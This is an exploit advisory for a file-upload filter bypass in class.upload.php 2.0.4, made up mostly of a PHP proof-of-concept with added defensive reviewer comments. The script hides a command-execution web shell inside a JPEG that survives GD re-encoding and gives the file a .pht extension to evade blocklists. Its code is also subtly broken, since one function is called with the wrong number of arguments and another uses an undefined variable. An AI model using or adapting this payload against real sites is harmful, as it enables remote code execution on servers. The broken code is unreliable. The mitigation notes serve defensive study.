class.upload.php v.2.0.4 Remote File Upload Vulnerability

2021.04.03
Risk: High
Local: No
Remote: Yes
CWE: CWE-434


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Remote File Upload Vulnerability - class.upload.php v.2.0.4
# Date: 03/04/2021
# Exploit Author: Tobias Marcotto
# Tested on: Kali Linux x64
# Version: 2.0.4
# Description: This is a filter bypass exploit that results in arbitrary file upload and remote code execution
*********************************************************************************************************
<?php
// Reviewer notes (defensive reading of the published PoC, CWE-434):
//  - The file produced here is a JPEG that survives a GD decode/re-encode
//    round trip at the same quality, so "is it a valid image?" checks
//    (getimagesize(), a GD re-encode) do not reject it on their own.
//    Content inspection alone is therefore not a sufficient upload control.
//  - The result name ends in a secondary extension (.pht) rather than .php;
//    presumably the extension blocklist in class.upload.php 2.0.4 does not
//    cover it while some web-server configurations still hand .pht to the
//    PHP interpreter -- the advisory text does not say which.
//  - Mitigations: an extension allowlist instead of a blocklist, renaming
//    uploads server-side to a fixed safe extension, storing uploads outside
//    the web root (or serving them from a location with script execution
//    disabled), and alerting on uploads whose name carries more than one
//    extension.
ini_set('display_errors', 1);
error_reporting(E_PARSE);           // warnings/notices are silenced; only parse errors surface
#requires php, php-gd
$orig = 'image.jpg';                // carrier image fetched below
$code = '<?=exec($_GET["c"])?>';    // PHP snippet that is written into the image bytes
$quality = "85";                    // JPEG quality used for every imagejpeg() call
$base_url = "http://lorempixel.com";
$output = 'image.jpg.pht';          // result name: double extension, .pht last
echo "-=Imagejpeg injector 1.8=-\n";
// Fetch a fresh 100x100 carrier and retry until tryInject() reports success.
do {
    $x = 100;
    $y = 100;
    $url = $base_url . "/$x/$y/";
    echo "[+] Fetching image ($x X $y) from $url\n";
    file_put_contents($orig, file_get_contents($url));
} while(!tryInject($orig, $code, $quality));
echo "[+] It seems like it worked!\n";
echo "[+] Result file: $output\n";

/**
 * Tries to place $code inside the entropy-coded segment of $orig (the bytes
 * after the Start Of Scan marker) at a position where the bytes survive a GD
 * decode followed by imagejpeg() at $quality.
 *
 * Returns true as soon as checkCodeInFile() finds the snippet in a
 * re-encoded candidate (the candidate bytes are written out first), false
 * after every offset after the SOS marker has been tried.
 */
function tryInject($orig, $code, $quality, $output)
{
    $tmp_filename = $orig . '_mod2.jpg';
    //Create base image and load its data
    $src = imagecreatefromjpeg($orig);
    imagejpeg($src, $tmp_filename, $quality);   // normalise the carrier through GD first
    $data = file_get_contents($tmp_filename);
    $tmpData = array();
    echo "[+] Jumping to end byte\n";
    $start_byte = findStart($data);     // offset just past the FF DA (Start Of Scan) marker
    echo "[+] Searching for valid injection point\n";
    // Walk backwards from the last byte; at each offset $i overwrite the
    // strlen($code) bytes ending at $i with the snippet (copied back to
    // front), re-encode through GD and test whether the snippet is still
    // present in the output.
    for($i = strlen($data)-1; $i > $start_byte; --$i) {
        $tmpData = $data;
        for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n) {
            $tmpData[$n] = $code[$z];
        }
        $src = imagecreatefromstring($tmpData);
        imagejpeg($src, $output, $quality);
        if(checkCodeInFile($result_file, $code)) {
            unlink($tmp_filename);
            unlink($result_file);
            sleep(1);
            file_put_contents($result_file, $tmpData);
            echo "[!] 
Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";
            sleep(1);
            $src = imagecreatefromjpeg($result_file);   // result unused; presumably a decode check on the written file
            return true;
        } else {
            unlink($output);
        }
    }
    unlink($orig);
    unlink($tmp_filename);
    return false;
}

/**
 * Returns the offset just after the first FF DA byte pair (the JPEG Start Of
 * Scan marker), i.e. where the entropy-coded image data begins, or -1 when
 * no such pair is found.
 */
function findStart($str)
{
    for($i = 0; $i < strlen($str); ++$i) {
        if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA) {
            return $i+2;
        }
    }
    return -1;
}

/**
 * Reports whether $code occurs verbatim in $file.
 *
 * Returns the strstr() result: the tail of the contents starting at the first
 * occurrence (truthy), or false when the snippet is absent or $file does not
 * exist (a missing file is treated as the contents "0").
 */
function checkCodeInFile($file, $code)
{
    if(file_exists($file)) {
        $contents = loadFile($file);
    } else {
        $contents = "0";
    }
    return strstr($contents, $code);
}

/**
 * Reads and returns the whole contents of $file as a string.
 */
function loadFile($file)
{
    $handle = fopen($file, "r");
    $buffer = fread($handle, filesize($file));
    fclose($handle);
    return $buffer;
}

